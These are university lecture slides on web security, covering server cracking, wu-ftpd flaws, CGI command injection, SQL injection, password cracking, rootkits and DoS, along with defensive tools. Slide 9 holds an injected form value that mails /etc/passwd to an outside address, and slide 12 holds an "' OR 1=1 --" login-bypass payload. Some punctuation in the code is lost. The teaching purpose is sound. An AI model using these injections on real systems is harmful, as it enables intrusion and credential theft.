Week 8: Web Security and Privacy

1
Week 8 Web Security and Privacy

• What are the security and privacy issues on the
  internet/web?
• Security Avoid intrusion/damage
• Privacy Protect private information (e.g. credit
  card transactions)
• How could your web server be compromised? What
  can you do to prevent it?
• Are you at risk as a web user? What can you do to
  safeguard yourself/your clients?
• How can a web service protect the integrity of
  its data and offer secure transactions to users?

2
Cracker

• What would a cracker want to do?
• See things on your system that are hidden
• Store things on your system without you knowing
  (warez)
• Attack your users
• Use your system as a stepping stone to other more
  interesting servers
• Deface or otherwise damage your server
• Just crack because it's there (pwned)
• The FBI released a warning to websites using
  shopping cart software named "PDG," which was
  utilized by roughly 4,000 websites, after a
  devastating bug was found that reveals all the
  company's customer information. One website,
  SawyerDesign.com, had purchased the software from
  a reseller leaving them out of touch from the
  notifications sent to direct customers. Once the
  site was discovered by carders, they had a field
  day racking up thousands of dollars on customers
  credit cards ranging from long distance cards to
  domain names. (source www.hackinthebox.org)

3
How to Crack a Server

• Cracking a web server means gaining some kind of
  unauthorised access to the server
• The first requirement is a communication channel
  with the server. Use port scanning to find open
  internet ports on the server and which server
  programs are running
• Having found a channel we need to exploit it to
  either run a program on the server or read useful
  files such as the password file
• Exploits typically take advantage of bugs or poor
  coding in servers or associated programs. Eg. a
  CGI script which doesn't check its input properly
  
• If we have the password file we can attempt to
  guess the passwords from a dictionary. If we have
  a password we can gain user level access to the
  system
• Alternately, we try to run a program on the
  server which exploits a system bug giving us root
  privileges and add ourselves as new superuser
  account

4
CGI

• The Common Gateway Interface (CGI) is a standard
  for interfacing external applications with
  information servers, such as HTTP or Web servers.
  
• A plain HTML document that the Web daemon
  retrieves is static, which means it exists in a
  constant state a text file that doesn't change.
• A CGI program, on the other hand, is executed in
  real-time, so that it can output dynamic
  information.
• For example, let's say that you wanted to "hook
  up" your Unix database to the World Wide Web, to
  allow people from all over the world to query it.
  Basically, you need to create a CGI program that
  the Web daemon will execute to transmit
  information to the database engine, and receive
  the results back again and display them to the
  client. This is an example of a gateway.
• The database example is a simple idea, but most
  of the time rather difficult to implement. There
  really is no limit as to what you can hook up to
  the Web. The only thing you need to remember is
  that whatever your CGI program does, it should
  not take too long to process. Otherwise, the user
  will just be staring at their browser waiting for
  something to happen.

5
Open Internet Ports

• Internet servers, particularly Unix servers, are
  configured with many internet services active by
  default
• Each service is allocated a TCP or UDP port eg
• ftp 21/tcp
• telnet 23/tcp
• finger 79/tcp Get info on users
• www 80/tcp WorldWideWeb
• HTTP pop3 110/tcp PostOffice Protocol
• irc 194/tcp Internet Relay Chat
• Each open port is associated with a server
  program eg. Apache for port 80, wuftpd for port
  21
• Knowing what servers are running means we can
  look for standard exploits of these programs or
  try to find new ones

6
Open Internet Ports

• You can use telnet to connect to any tcp port and
  gain some information about the server program
• telnet ftp.usyd.edu.au 21
• Trying 137.111.1.11...
• Connected to sunb.usyd.edu.au.
• Escape character is ''.
• 220-
• 220- This is the Sydney University anonymous ftp
  server.
• 220- All transfers are logged, if you don't like
  this policy then 220- disconnect now.
• 220-
• 220-
• 220 sunb FTP server (Version wu-2.6.1(2) Sat Dec
  1 113349 EST 2001) ready.
• We now know that ftp.usyd.edu.au runs version
  2.6.1 or wu-ftpd
• WU-FTPD is an ftp daemon for Unix systems

7
Exploiting Security Holes

• Large programs have bugs bugs lead to security
  holes most internet servers are large programs
• The aim of an exploit is to either access system
  files (passwords) or run code on the system
• Two classes of exploit are buffer overflows and
  taking advantage of poor coding in server
  programs or CGI scripts
• Buffer overflows occur when the amount of data
  sent as input is larger than a predefined buffer
  size in the server program. The cracker can place
  code in the overflowed area which may then be run
  by the program
• The most useful examples of poor coding are where
  servers or cgi programs call other programs, in
  particular shell scripts

8
WU-FTPD Exploit http//www.wu-ftpd.org/

• WU-FTPD File Globbing Denial of Service
  Vulnerability
• Remote exploitation of an input validation
  vulnerability in version 2.6.2 of WU-FPTD could
  allow for a denial of service of the system by
  resource exhaustion.
• The vulnerability specifically exists in the
  wu_fnmatch() function in wu_fnmatch.c.
• When a pattern containing a '' character is
  supplied as input, the function calls itself
  recursively on a smaller substring. By supplying
  a string which contains a large number of ''
  characters, the system will take a long time to
  return the results, during which time it will be
  using a large amount of CPU time.
• Buffer Overflow Exploit Wu-ftpd is vulnerable to
  a very serious remote attack in the SITE EXEC
  implementation. Because of user input going
  directly into a format string for a printf
  function, it is possible to overwrite important
  data, such as a return address, on the stack.
  When this is accomplished, the function can jump
  into shellcode pointed to by the overwritten eip
  and execute arbitrary commands as root. (Source
  SecurityFocus.com) SecurityFocus.com provides
  example C programs which take advantage of this
  exploit

9
Exploiting CGI Scripts

• Many web servers come with some example scripts
  which show CGI features but which are vulnerable
  if left in place.
• Other programs are widely used, eg. discussion
  servers, web mail forms, etc. Knowing that they
  are there enables exploits to be attempted
• For example if the input to is john_at_gmail.com
  mail john_at_gmail.com lt /etc/passwd"
• to form'to'
• subj form'subj'
• body form'body'
• exec("echo 'body' /usr/bin/mail -s subj to")
  
• the command run by the CGI script is
• echo 'some message' /usr/bin/mail -s crack
  john_at_gmail.com \
• mail john_at_gmail.com lt /etc/passwd

10
An Example CGI Exploit

• FormMail.pl Web-to-Email CGI Script Allows
  Unauthorized Users to Send Mail (e.g., spam)
  Anonymously
• http//securitytracker.com/alerts/2001/Mar/1001108
  .html
• Security Tracker describes an exploit to a common
  script formmail.pl which sends email via a web
  form
• The script trusts its input and sends a mail,
  this allows SPAM email to be sent via the form
• From the web server log
• 64-187-39-131.powergate.ca - - 20/Feb/20031146
  32 1100 "GET http//www.shlrc.usyd.edu.au/cgi-b
  in/FormMail.cgi? emailFormMail_at_mail.comrecipient
  ltformmailss_at_aol.comgt shlrc.usyd.edu.ausubjectww
  w.shlrc.mq.edu.au/cgi-bin/FormMail.cgi
  date/timeWed/Feb/19/746pm HTTP/1.0" 404 214
  "-" "Mozilla/??"

11
SQL Injection

• SQL Injection is a form of CGI exploit that takes
  advantage of poorly coded database interfaces.
• Allows access to the server database, to insert,
  delete or retrieve data
• Some database systems can allow remote execution
  of arbitrary programs
• Well developed techniques and systems for finding
  vulnerabilities
• A SQL injection attack consists of insertion or
  "injection" of a SQL query via the input data
  from the client to the application. A successful
  SQL injection exploit can read sensitive data
  from the database, modify database data
  (Insert/Update/Delete), execute administration
  operations on the database (such as shutdown the
  DBMS), recover the content of a given file
  present on the DBMS file system and in some cases
  issue commands to the operating system. SQL
  injection attacks are a type of injection attack,
  in which SQL commands are injected into
  data-plane input in order to effect the execution
  of predefined SQL commands.
• Example exploit on YouTube http//www.youtube.com/
  watch?vMJNJjh4jORY
• sqlmap is an open source SQL injection tool
• http//sqlmap.sourceforge.net/

12
SQL Injection

• user form.get_value("user")
• password form.get_value("password")
• query "SELECT FROM users WHERE user'"user"'
  AND password'"password"'
• cur.execute(query) ...
• If user"hacker" and password"' OR 11 --"
• SELECT FROM users WHERE user'hacker' AND
  password'' OR 11 --'
• user form.get_value("user") password
  form.get_value("password") query "SELECT FROM
  users WHERE user? AND password?"
  cur.execute(query, (user, password)) ...
• If user"hacker" and password"' or 11 --"
• SELECT FROM users WHERE user'hacker' AND
  password'\' or 11 --'

13
Cracking Passwords

• On unix systems, passwords are stored in
  encrypted form in the /etc/passwd file (or more
  recently in /etc/shadow)
• The stored password is the result of encrypting a
  constant string repeatedly using an encryption
  key derived from the typed password
• Since the raw password is not stored, to find a
  password you need to try encoding many passwords
  and comparing against the stored passwords
• Use a dictionary or word list and try simple
  variations such as adding numbers. Other systems
  have used generators of pronounceable' strings
• The standard crypt program on unix has a built in
  delay to make bulk checking slow but a cracker
  can remove this and check thousands of words very
  quickly
• Once a cracker has user access to a machine they
  can log in as usual
• Now a whole new range of security exploits are
  possible, involving non-server programs
• The ultimate goal of the cracker is to get root
  access to the machine

14
Network Packet Sniffing

• If a cracker has root access to the machine, a
  next step might be to look for more access on the
  local network
• The cracker may try the passwords gained on other
  machines on the local network abusing the trust
  between local machines
• Another option is to listen on the Ethernet for
  user traffic. The goal is to see a users
  login/password going past on the network to gain
  access to other machines
• To do this the cracker needs to put the ethernet
  interface into promiscuous mode. This (normally)
  requires root access
• Packet sniffing can happen anywhere on the route
  between client and server -- eg. on a ISP router
  machine

15
Automated Cracking Script Kiddies

• Some exploits are so well known that the
  procedure for carrying them out is encoded in so
  called root kits
• These are scripts and programs that can be run to
  break into a vulnerable system, install a
  backdoor or trojan and then conceal the intrusion
  
• The availability of these root kits leads to a
  group of crackers (script kiddies) who are just
  in it for the thrill. It also enables widespread
  cracking of systems by automated agents
• Programs like chkrootkit check system binaries
  for rootkit modification
• Read Rootkits (WikiPedia) http//en.wikipedia.org
  /wiki/Rootkit

16
http//www.chkrootkit.org/

• chkrootkit is a tool to locally check for signs
  of a rootkit. It contains
• chkrootkit shell script that checks system
  binaries for rootkit modification.
• ifpromisc.c checks if the interface is in
  promiscuous mode.
• chklastlog.c checks for lastlog deletions.
• chkwtmp.c checks for wtmp deletions.
• check_wtmpx.c checks for wtmpx deletions.
  (Solaris only)
• chkproc.c checks for signs of LKM trojans.
• chkdirs.c checks for signs of LKM trojans.
• strings.c quick and dirty strings replacement.
• chkutmp.c checks for utmp deletions.
• rootkit is a program (or combination of several
  programs) designed to take fundamental control
  (in Unix terms "root" access, in Windows
  "Administrator" access) of a computer system,
  without authorization by the system's owners and
  legitimate managers.

17
Trojan Horses

• Named after the Trojan Horse used by the Greeks
  to sack Troy
• Programs that look harmless or useful but contain
  hidden features
• The user may not know that the program hides
  information
• E.g. a trojaned ps command may not display
  running processes initiated by the intruder
• The user may believe that the system is safe
• The program may produce specific behaviour
• E.g. a trojaned passwd that grants root shell if
  rootkit password is entered as current password

18
Denial of Service Attacks

• DOS attacks seek to harm a user or a site by
  making them unuseable in some way
• A DOS attack on a web server can come from
  outside, it doesn't require access to the machine
  
• A common DOS attack is carried out by flooding a
  host with network traffic or by sending special
  TCP packets to the host
• Recently we have seen Distributed DOS attacks
  where many machines are cracked into and used as
  sources in the DOS attack against one host, (eg.
  Trin00) http//staff.washington.edu/dittrich/misc/
  trinoo.analysis
• DOS attacks can also be carried out by triggering
  a system bug, eg. the Microsoft Windows 95 TCP/IP
  Address out-of-band bug http//support.microsoft.c
  om/kb/q168747/

19
More reading

• The WWW Security FAQ
• http//www.w3.org/Security/Faq/www-security-faq.ht
  ml
• The Unofficial Web Hack FAQ provides more
  underground' info but might be getting dated
  now.
• http//www.nmrc.org/pub/faq/hackfaq/index.html
• More white hat info from securityfocus.com which
  has current information on system vulnerabilities
  
• http//www.securityfocus.com/
• The Jargon File, otherwise known as the Hacker's
  Dictionary, defines many terms like hack, crack
  and warez d00dz
• http//www.catb.org/esr/jargon/html/